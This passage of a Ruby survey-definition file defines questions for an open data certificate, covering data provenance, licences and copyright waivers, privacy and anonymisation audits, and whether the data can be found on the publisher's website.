q_sourceDocumentationUrl 'Where do you describe sources of this data?',
:discussion_topic => :uy_sourceDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The sources of this data are described at',
:help_text => 'Give a URL that documents where the data was sourced from (its provenance) and the rights under which you publish the data. This helps people understand where the data comes from.'
dependency :rule => 'A'
condition_A :q_publisherOrigin, '==', :a_false
a_1 'Data Sources Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Data Sources Documentation URL',
:requirement => ['pilot_3']
label_pilot_3 'You should document <strong>where the data came from and the rights under which you publish it</strong>, so people are assured they can use parts which came from third parties.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_3'
dependency :rule => 'A and B'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_sourceDocumentationMetadata 'Is documentation about the sources of this data also in machine-readable format?',
:discussion_topic => :uy_sourceDocumentationMetadata,
:display_on_certificate => true,
:text_as_statement => 'The curator has published',
:help_text => 'Information about data sources should be human-readable so people can understand it, as well as in a metadata format that computers can process. When everyone does this it helps other people find out how the same open data is being used and justify its ongoing publication.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable data about the sources of this data',
:requirement => ['standard_2']
label_standard_2 'You should <strong>include machine-readable data about the sources of this data</strong>.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_2'
dependency :rule => 'A and B and C'
condition_A :q_publisherOrigin, '==', :a_false
condition_B :q_sourceDocumentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_C :q_sourceDocumentationMetadata, '==', :a_false
label_group_3 'Licensing',
:help_text => 'how you give people permission to use this data',
:customer_renderer => '/partials/fieldset'
q_copyrightURL 'Where have you published the rights statement for this dataset?',
:discussion_topic => :uy_copyrightURL,
:display_on_certificate => true,
:text_as_statement => 'The rights statement is at',
:help_text => 'Give the URL to a page that describes the right to re-use this dataset. This should include a reference to its license, attribution requirements, and a statement about relevant copyright. A rights statement helps people understand what they can and can\'t do with the data.'
a_1 'Rights Statement URL',
:string,
:input_type => :url,
:placeholder => 'Rights Statement URL',
:requirement => ['pilot_4']
label_pilot_4 'You should <strong>publish a rights statement</strong> that details copyright, licensing and how people should give attribution to the data.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_4'
dependency :rule => 'A'
condition_A :q_copyrightURL, '==', {:string_value => '', :answer_reference => '1'}
q_dataLicence 'Under which licence can people reuse this data?',
:discussion_topic => :uy_dataLicence,
:display_on_certificate => true,
:text_as_statement => 'This data is available under',
:help_text => 'Remember that whoever spends intellectual effort creating content automatically gets rights over it. Creative content includes the organisation and selection of items within data, but does not include facts. So people need a waiver or a licence which proves that they can use the data and explains how they can do that legally. We list the most common licenses here; if there is no copyright in the data, it\'s expired, or you\'ve waived them, choose \'Not applicable\'.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
a_cc_by 'Creative Commons Attribution',
:text_as_statement => 'Creative Commons Attribution'
a_cc_by_sa 'Creative Commons Attribution Share-Alike',
:text_as_statement => 'Creative Commons Attribution Share-Alike'
a_cc_zero 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_odc_by 'Open Data Commons Attribution License',
:text_as_statement => 'Open Data Commons Attribution License'
a_odc_odbl 'Open Data Commons Open Database License (ODbL)',
:text_as_statement => 'Open Data Commons Open Database License (ODbL)'
a_odc_pddl 'Open Data Commons Public Domain Dedication and Licence (PDDL)',
:text_as_statement => 'Open Data Commons Public Domain Dedication and Licence (PDDL)'
a_na 'Not applicable',
:text_as_statement => ''
a_other 'Other...',
:text_as_statement => ''
q_dataNotApplicable 'Why doesn\'t a licence apply to this data?',
:discussion_topic => :uy_dataNotApplicable,
:display_on_certificate => true,
:text_as_statement => 'This data is not licensed because',
:pick => :one,
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_na
a_norights 'there is no copyright in this data',
:text_as_statement => 'there is no copyright in it',
:help_text => 'Copyright only applies to data if you spent intellectual effort creating what\'s in it, for example, by writing text that\'s within the data, or deciding whether particular data is included. There\'s no copyright if the data only contains facts where no judgements were made about whether to include them or not.'
a_expired 'copyright has expired',
:text_as_statement => 'copyright has expired',
:help_text => 'Copyright lasts for a fixed amount of time, based on either the number of years after the death of its creator or its publication. You should check when the content was created or published because if that was a long time ago, copyright might have expired.'
a_waived 'copyright has been waived',
:text_as_statement => '',
:help_text => 'This means no one owns copyright and anyone can do whatever they want with this data.'
q_dataWaiver 'Which waiver do you use to waive copyright in the data?',
:discussion_topic => :uy_dataWaiver,
:display_on_certificate => true,
:text_as_statement => 'Rights in the data have been waived with',
:help_text => 'You need a statement to show people copyright has been waived, so they understand that they can do whatever they like with this data. Standard waivers already exist like PDDL and CCZero but you can write your own with legal advice.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A and B'
condition_A :q_dataLicence, '==', :a_na
condition_B :q_dataNotApplicable, '==', :a_waived
a_pddl 'Open Data Commons Public Domain Dedication and Licence (PDDL)',
:text_as_statement => 'Open Data Commons Public Domain Dedication and Licence (PDDL)'
a_cc0 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_other 'Other...',
:text_as_statement => ''
q_dataOtherWaiver 'Where is the waiver for the copyright in the data?',
:discussion_topic => :uy_dataOtherWaiver,
:display_on_certificate => true,
:text_as_statement => 'Rights in the data have been waived with',
:help_text => 'Give a URL to your own publicly available waiver so people can check that it does waive copyright in the data.',
:required => :required
dependency :rule => 'A and B and C'
condition_A :q_dataLicence, '==', :a_na
condition_B :q_dataNotApplicable, '==', :a_waived
condition_C :q_dataWaiver, '==', :a_other
a_1 'Waiver URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Waiver URL'
q_otherDataLicenceName 'What is the name of the licence?',
:discussion_topic => :uy_otherDataLicenceName,
:display_on_certificate => true,
:text_as_statement => 'This data is available under',
:help_text => 'If you use a different licence, we need the name so people can see it on your Open Data Certificate.',
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_1 'Other Licence Name',
:string,
:required => :required,
:placeholder => 'Other Licence Name'
q_otherDataLicenceURL 'Where is the licence?',
:discussion_topic => :uy_otherDataLicenceURL,
:display_on_certificate => true,
:text_as_statement => 'This licence is at',
:help_text => 'Give a URL to the licence, so people can see it on your Open Data Certificate and check that it\'s publicly available.',
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_1 'Other Licence URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Other Licence URL'
q_otherDataLicenceOpen 'Is the licence an open licence?',
:discussion_topic => :uy_otherDataLicenceOpen,
:help_text => 'If you aren\'t sure what an open licence is then read the <a href="http://opendefinition.org/">Open Knowledge Definition</a> definition. Next, choose your licence from the <a href="http://licenses.opendefinition.org/">Open Definition Advisory Board open licence list</a>. If a licence isn\'t in their list, it\'s either not open or hasn\'t been assessed yet.',
:help_text_more_url => 'http://opendefinition.org/',
:pick => :one,
:required => :required
dependency :rule => 'A'
condition_A :q_dataLicence, '==', :a_other
a_false 'no'
a_true 'yes',
:requirement => ['basic_7']
label_basic_7 'You must <strong>publish open data under an open licence</strong> so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_7'
dependency :rule => 'A and B'
condition_A :q_dataLicence, '==', :a_other
condition_B :q_otherDataLicenceOpen, '==', :a_false
q_contentRights 'Is there any copyright in the content of this data?',
:discussion_topic => :uy_contentRights,
:display_on_certificate => true,
:text_as_statement => 'There are',
:pick => :one,
:required => :required
a_norights 'no, the data only contains facts and numbers',
:text_as_statement => 'no rights in the content of the data',
:help_text => 'There is no copyright in factual information. If the data does not contain any content that was created through intellectual effort, there are no rights in the content.'
a_samerights 'yes, and the rights are all held by the same person or organisation',
:text_as_statement => '',
:help_text => 'Choose this option if the content in the data was all created by or transferred to the same person or organisation.'
a_mixedrights 'yes, and the rights are held by different people or organisations',
:text_as_statement => '',
:help_text => 'In some data, the rights in different records are held by different people or organisations. Information about rights needs to be kept in the data too.'
q_explicitWaiver 'Is the content of the data marked as public domain?',
:discussion_topic => :uy_explicitWaiver,
:display_on_certificate => true,
:text_as_statement => 'The content has been',
:help_text => 'Content can be marked as public domain using the <a href="http://creativecommons.org/publicdomain/">Creative Commons Public Domain Mark</a>. This helps people know that it can be freely reused.',
:pick => :one
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_norights
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'marked as public domain',
:requirement => ['standard_3']
label_standard_3 'You should <strong>mark public domain content as public domain</strong> so that people know they can reuse it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_3'
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_norights
condition_B :q_explicitWaiver, '==', :a_false
q_contentLicence 'Under which licence can others reuse content?',
:discussion_topic => :uy_contentLicence,
:display_on_certificate => true,
:text_as_statement => 'The content is available under',
:help_text => 'Remember that whoever spends intellectual effort creating content automatically gets rights over it but creative content does not include facts. So people need a waiver or a licence which proves that they can use the content and explains how they can do that legally. We list the most common licenses here; if there is no copyright in the content, it\'s expired, or you\'ve waived them, choose \'Not applicable\'.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_samerights
a_cc_by 'Creative Commons Attribution',
:text_as_statement => 'Creative Commons Attribution'
a_cc_by_sa 'Creative Commons Attribution Share-Alike',
:text_as_statement => 'Creative Commons Attribution Share-Alike'
a_cc_zero 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_na 'Not applicable',
:text_as_statement => ''
a_other 'Other...',
:text_as_statement => ''
q_contentNotApplicable 'Why doesn\'t a licence apply to the content of the data?',
:discussion_topic => :uy_contentNotApplicable,
:display_on_certificate => true,
:text_as_statement => 'The content in this data is not licensed because',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
a_norights 'there is no copyright in the content of this data',
:text_as_statement => 'there is no copyright',
:help_text => 'Copyright only applies to content if you spent intellectual effort creating it, for example, by writing text that\'s within the data. There\'s no copyright if the content only contains facts.'
a_expired 'copyright has expired',
:text_as_statement => 'copyright has expired',
:help_text => 'Copyright lasts for a fixed amount of time, based on either the number of years after the death of its creator or its publication. You should check when the content was created or published because if that was a long time ago, copyright might have expired.'
a_waived 'copyright has been waived',
:text_as_statement => '',
:help_text => 'This means no one owns copyright and anyone can do whatever they want with this data.'
q_contentWaiver 'Which waiver do you use to waive copyright?',
:discussion_topic => :uy_contentWaiver,
:display_on_certificate => true,
:text_as_statement => 'Copyright has been waived with',
:help_text => 'You need a statement to show people you\'ve done this, so they understand that they can do whatever they like with this data. Standard waivers already exist like CCZero but you can write your own with legal advice.',
:pick => :one,
:required => :required,
:display_type => 'dropdown'
dependency :rule => 'A and B and C'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
condition_C :q_contentNotApplicable, '==', :a_waived
a_cc0 'Creative Commons CCZero',
:text_as_statement => 'Creative Commons CCZero'
a_other 'Other...',
:text_as_statement => 'Other...'
q_contentOtherWaiver 'Where is the waiver for the copyright?',
:discussion_topic => :uy_contentOtherWaiver,
:display_on_certificate => true,
:text_as_statement => 'Copyright has been waived with',
:help_text => 'Give a URL to your own publicly available waiver so people can check that it does waive your copyright.',
:required => :required
dependency :rule => 'A and B and C and D'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_na
condition_C :q_contentNotApplicable, '==', :a_waived
condition_D :q_contentWaiver, '==', :a_other
a_1 'Waiver URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Waiver URL'
q_otherContentLicenceName 'What\'s the name of the licence?',
:discussion_topic => :uy_otherContentLicenceName,
:display_on_certificate => true,
:text_as_statement => 'The content is available under',
:help_text => 'If you use a different licence, we need its name so people can see it on your Open Data Certificate.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_1 'Licence Name',
:string,
:required => :required,
:placeholder => 'Licence Name'
q_otherContentLicenceURL 'Where is the licence?',
:discussion_topic => :uy_otherContentLicenceURL,
:display_on_certificate => true,
:text_as_statement => 'The content licence is at',
:help_text => 'Give a URL to the licence, so people can see it on your Open Data Certificate and check that it\'s publicly available.',
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_1 'Licence URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Licence URL'
q_otherContentLicenceOpen 'Is the licence an open licence?',
:discussion_topic => :uy_otherContentLicenceOpen,
:help_text => 'If you aren\'t sure what an open licence is then read the <a href="http://opendefinition.org/">Open Knowledge Definition</a> definition. Next, choose your licence from the <a href="http://licenses.opendefinition.org/">Open Definition Advisory Board open licence list</a>. If a licence isn\'t in their list, it\'s either not open or hasn\'t been assessed yet.',
:help_text_more_url => 'http://opendefinition.org/',
:pick => :one,
:required => :required
dependency :rule => 'A and B'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
a_false 'no'
a_true 'yes',
:requirement => ['basic_8']
label_basic_8 'You must <strong>publish open data under an open licence</strong> so that people can use it.',
:custom_renderer => '/partials/requirement_basic',
:requirement => 'basic_8'
dependency :rule => 'A and B and C'
condition_A :q_contentRights, '==', :a_samerights
condition_B :q_contentLicence, '==', :a_other
condition_C :q_otherContentLicenceOpen, '==', :a_false
q_contentRightsURL 'Where are the rights and licensing of the content explained?',
:discussion_topic => :uy_contentRightsURL,
:display_on_certificate => true,
:text_as_statement => 'The rights and licensing of the content are explained at',
:help_text => 'Give the URL for a page where you describe how someone can find out the rights and licensing of a piece of content from the data.',
:required => :required
dependency :rule => 'A'
condition_A :q_contentRights, '==', :a_mixedrights
a_1 'Content Rights Description URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Content Rights Description URL'
q_copyrightStatementMetadata 'Does your rights statement include machine-readable versions of',
:discussion_topic => :uy_copyrightStatementMetadata,
:display_on_certificate => true,
:text_as_statement => 'The rights statement includes data about',
:help_text => 'It\'s good practice to embed information about rights in machine-readable formats so people can automatically attribute this data back to you when they use it.',
:help_text_more_url => 'https://github.com/theodi/open-data-licensing/blob/master/guides/publisher-guide.md',
:pick => :any
dependency :rule => 'A'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
a_dataLicense 'data licence',
:text_as_statement => 'its data licence',
:requirement => ['standard_4']
a_contentLicense 'content licence',
:text_as_statement => 'its content licence',
:requirement => ['standard_5']
a_attribution 'attribution text',
:text_as_statement => 'what attribution text to use',
:requirement => ['standard_6']
a_attributionURL 'attribution URL',
:text_as_statement => 'what attribution link to give',
:requirement => ['standard_7']
a_copyrightNotice 'copyright notice or statement',
:text_as_statement => 'a copyright notice or statement',
:requirement => ['exemplar_1']
a_copyrightYear 'copyright year',
:text_as_statement => 'the copyright year',
:requirement => ['exemplar_2']
a_copyrightHolder 'copyright holder',
:text_as_statement => 'the copyright holder',
:requirement => ['exemplar_3']
label_standard_4 'You should provide <strong>machine-readable data in your rights statement about the licence</strong> for this data, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_4'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_dataLicense
label_standard_5 'You should provide <strong>machine-readable data in your rights statement about the licence for the content</strong> of this data, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_5'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_contentLicense
label_standard_6 'You should provide <strong>machine-readable data in your rights statement about the text to use when citing the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_6'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_attribution
label_standard_7 'You should provide <strong>machine-readable data in your rights statement about the URL to link to when citing this data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_7'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_attributionURL
label_exemplar_1 'You should provide <strong>machine-readable data in your rights statement about the copyright statement or notice of this data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_1'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightNotice
label_exemplar_2 'You should provide <strong>machine-readable data in your rights statement about the copyright year for the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_2'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightYear
label_exemplar_3 'You should provide <strong>machine-readable data in your rights statement about the copyright holder for the data</strong>, so automatic tools can use it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_3'
dependency :rule => 'A and B'
condition_A :q_copyrightURL, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_copyrightStatementMetadata, '!=', :a_copyrightHolder
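# A minimal sketch of what a machine-readable rights statement covering the
# answers above could look like, serialised as JSON with Ruby's standard
# library. The field names simply mirror the answer identifiers above and are
# illustrative rather than a prescribed vocabulary; the URLs and values are
# made up.
#
#   require 'json'
#
#   rights_statement = {
#     'dataLicense'     => 'http://opendatacommons.org/licenses/by/1.0/',
#     'contentLicense'  => 'https://creativecommons.org/licenses/by/4.0/',
#     'attributionText' => 'Example Department',
#     'attributionURL'  => 'http://example.com/data',
#     'copyrightNotice' => 'Copyright Example Department',
#     'copyrightYear'   => 2013,
#     'copyrightHolder' => 'Example Department'
#   }
#
#   puts JSON.pretty_generate(rights_statement)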
label_group_4 'Privacy',
:help_text => 'how you protect people\'s privacy',
:custom_renderer => '/partials/fieldset'
q_dataPersonal 'Can individuals be identified from this data?',
:discussion_topic => :uy_dataPersonal,
:display_on_certificate => true,
:text_as_statement => 'This data contains',
:pick => :one,
:required => :pilot
a_not_personal 'no, the data is not about people or their activities',
:text_as_statement => 'no data about individuals',
:help_text => 'Remember that individuals can still be identified even if data isn\'t directly about them. For example, road traffic flow data combined with an individual\'s commuting patterns could reveal information about that person.'
a_summarised 'no, the data has been anonymised by aggregating individuals into groups, so they can\'t be distinguished from other people in the group',
:text_as_statement => 'aggregated data',
:help_text => 'Statistical disclosure controls can help to make sure that individuals are not identifiable within aggregate data.'
a_individual 'yes, there is a risk that individuals could be identified, for example by third parties with access to extra information',
:text_as_statement => 'information that could identify individuals',
:help_text => 'Some data is legitimately about individuals, such as civil service pay or public expenses.'
q_statisticalAnonAudited 'Has your anonymisation process been independently audited?',
:discussion_topic => :uy_statisticalAnonAudited,
:display_on_certificate => true,
:text_as_statement => 'The anonymisation process has been',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataPersonal, '==', :a_summarised
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_8']
label_standard_8 'You should <strong>have your anonymisation process audited independently</strong> to ensure it reduces the risk of individuals being reidentified.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_8'
dependency :rule => 'A and B'
condition_A :q_dataPersonal, '==', :a_summarised
condition_B :q_statisticalAnonAudited, '==', :a_false
q_appliedAnon 'Have you attempted to reduce or remove the possibility of individuals being identified?',
:discussion_topic => :uy_appliedAnon,
:display_on_certificate => true,
:text_as_statement => 'This data about individuals has been',
:help_text => 'Anonymisation reduces the risk of individuals being identified from the data you publish. The best technique to use depends on the kind of data you have.',
:pick => :one,
:required => :pilot
dependency :rule => 'A'
condition_A :q_dataPersonal, '==', :a_individual
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'anonymised'
q_lawfulDisclosure 'Are you required or permitted by law to publish this data about individuals?',
:discussion_topic => :uy_lawfulDisclosure,
:display_on_certificate => true,
:text_as_statement => 'By law, this data about individuals',
:help_text => 'The law might require you to publish data about people, such as the names of company directors. Or you might have permission from the affected individuals to publish information about them.',
:pick => :one
dependency :rule => 'A and B'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'can be published',
:requirement => ['pilot_5']
label_pilot_5 'You should <strong>only publish personal data without anonymisation if you are required or permitted to do so by law</strong>.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_5'
dependency :rule => 'A and B and C'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_false
q_lawfulDisclosureURL 'Where do you document your right to publish data about individuals?',
:discussion_topic => :uy_lawfulDisclosureURL,
:display_on_certificate => true,
:text_as_statement => 'The right to publish this data about individuals is documented at'
dependency :rule => 'A and B and C'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_true
a_1 'Disclosure Rationale URL',
:string,
:input_type => :url,
:placeholder => 'Disclosure Rationale URL',
:requirement => ['standard_9']
label_standard_9 'You should <strong>document your right to publish data about individuals</strong> for people who use your data and for those affected by disclosure.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_9'
dependency :rule => 'A and B and C and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_false
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_lawfulDisclosureURL, '==', {:string_value => '', :answer_reference => '1'}
q_riskAssessmentExists 'Have you assessed the risks of disclosing personal data?',
:discussion_topic => :uy_riskAssessmentExists,
:display_on_certificate => true,
:text_as_statement => 'The curator has',
:help_text => 'A risk assessment measures risks to the privacy of individuals in your data as well as the use and disclosure of that information.',
:pick => :one
dependency :rule => 'A and (B or C)'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
a_false 'no',
:text_as_statement => 'not carried out a privacy risk assessment'
a_true 'yes',
:text_as_statement => 'carried out a privacy risk assessment',
:requirement => ['pilot_6']
label_pilot_6 'You should <strong>assess the risks of disclosing personal data</strong> if you publish data about individuals.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_6'
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_false
q_riskAssessmentUrl 'Where is your risk assessment published?',
:discussion_topic => :uy_riskAssessmentUrl,
:display_on_certificate => true,
:text_as_statement => 'The risk assessment is published at',
:help_text => 'Give a URL to where people can check how you have assessed the privacy risks to individuals. This may be redacted or summarised if it contains sensitive information.'
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
a_1 'Risk Assessment URL',
:string,
:input_type => :url,
:placeholder => 'Risk Assessment URL',
:requirement => ['standard_10']
label_standard_10 'You should <strong>publish your privacy risk assessment</strong> so people can understand how you have assessed the risks of disclosing data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_10'
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '==', {:string_value => '', :answer_reference => '1'}
q_riskAssessmentAudited 'Has your risk assessment been independently audited?',
:discussion_topic => :uy_riskAssessmentAudited,
:display_on_certificate => true,
:text_as_statement => 'The risk assessment has been',
:help_text => 'It\'s good practice to check your risk assessment was done correctly. Independent audits by specialists or third-parties tend to be more rigorous and impartial.',
:pick => :one
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_11']
label_standard_11 'You should <strong>have your risk assessment audited independently</strong> to ensure it has been carried out correctly.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_11'
dependency :rule => 'A and (B or C) and D and E and F'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_riskAssessmentUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_F :q_riskAssessmentAudited, '==', :a_false
q_anonymisationAudited 'Has your anonymisation approach been independently audited?',
:discussion_topic => :uy_anonymisationAudited,
:display_on_certificate => true,
:text_as_statement => 'The anonymisation of the data has been',
:help_text => 'It is good practice to make sure your process to remove personally identifiable data works properly. Independent audits by specialists or third-parties tend to be more rigorous and impartial.',
:pick => :one
dependency :rule => 'A and (B or C) and D'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'independently audited',
:requirement => ['standard_12']
label_standard_12 'You should <strong>have your anonymisation process audited independently</strong> by an expert to ensure it is appropriate for your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_12'
dependency :rule => 'A and (B or C) and D and E'
condition_A :q_dataPersonal, '==', :a_individual
condition_B :q_appliedAnon, '==', :a_true
condition_C :q_lawfulDisclosure, '==', :a_true
condition_D :q_riskAssessmentExists, '==', :a_true
condition_E :q_anonymisationAudited, '==', :a_false
end
section_practical 'Practical Information',
:description => 'Findability, accuracy, quality and guarantees' do
label_group_6 'Findability',
:help_text => 'how you help people find your data',
:custom_renderer => '/partials/fieldset'
q_onWebsite 'Is there a link to your data from your main website?',
:discussion_topic => :onWebsite,
:help_text => 'Data can be found more easily if it is linked to from your main website.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_13']
label_standard_13 'You should <strong>link to the data from your main website</strong> so that people can find it more easily.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_13'
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_false
repeater 'Web Page' do
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_true
q_webpage 'Which page on your website links to the data?',
:discussion_topic => :webpage,
:display_on_certificate => true,
:text_as_statement => 'The website links to the data from',
:help_text => 'Give a URL on your main website that includes a link to this data.',
:required => :required
dependency :rule => 'A'
condition_A :q_onWebsite, '==', :a_true
a_1 'Web page URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Web page URL'
end
q_listed 'Is your data listed within a collection?',
:discussion_topic => :listed,
:help_text => 'Data is easier for people to find when it\'s listed in relevant data catalogues, such as academic, public sector or health catalogues, or when it turns up in relevant search results.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_14']
label_standard_14 'You should <strong>ensure that people can find your data when they search for it</strong> in locations that list data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_14'
dependency :rule => 'A'
condition_A :q_listed, '==', :a_false
repeater 'Listing' do
dependency :rule => 'A'
condition_A :q_listed, '==', :a_true
q_listing 'Where is it listed?',
:discussion_topic => :listing,
:display_on_certificate => true,
:text_as_statement => 'The data appears in this collection',
:help_text => 'Give a URL where this data is listed within a relevant collection. For example, data.gov.uk (if it\'s UK public sector data), hub.data.ac.uk (if it\'s UK academia data) or a URL for search engine results.',
:required => :required
dependency :rule => 'A'
condition_A :q_listed, '==', :a_true
a_1 'Listing URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Listing URL'
end
q_referenced 'Is this data referenced from your own publications?',
:discussion_topic => :referenced,
:help_text => 'When you reference your data within your own publications, such as reports, presentations or blog posts, you give it more context and help people find and understand it better.',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_15']
label_standard_15 'You should <strong>reference data from your own publications</strong> so that people are aware of its availability and context.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_15'
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_false
repeater 'Reference' do
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_true
q_reference 'Where is your data referenced?',
:discussion_topic => :reference,
:display_on_certificate => true,
:text_as_statement => 'This data is referenced from',
:help_text => 'Give a URL to a document that cites or references this data.',
:required => :required
dependency :rule => 'A'
condition_A :q_referenced, '==', :a_true
a_1 'Reference URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Reference URL'
end
label_group_7 'Accuracy',
:help_text => 'how you keep your data up-to-date',
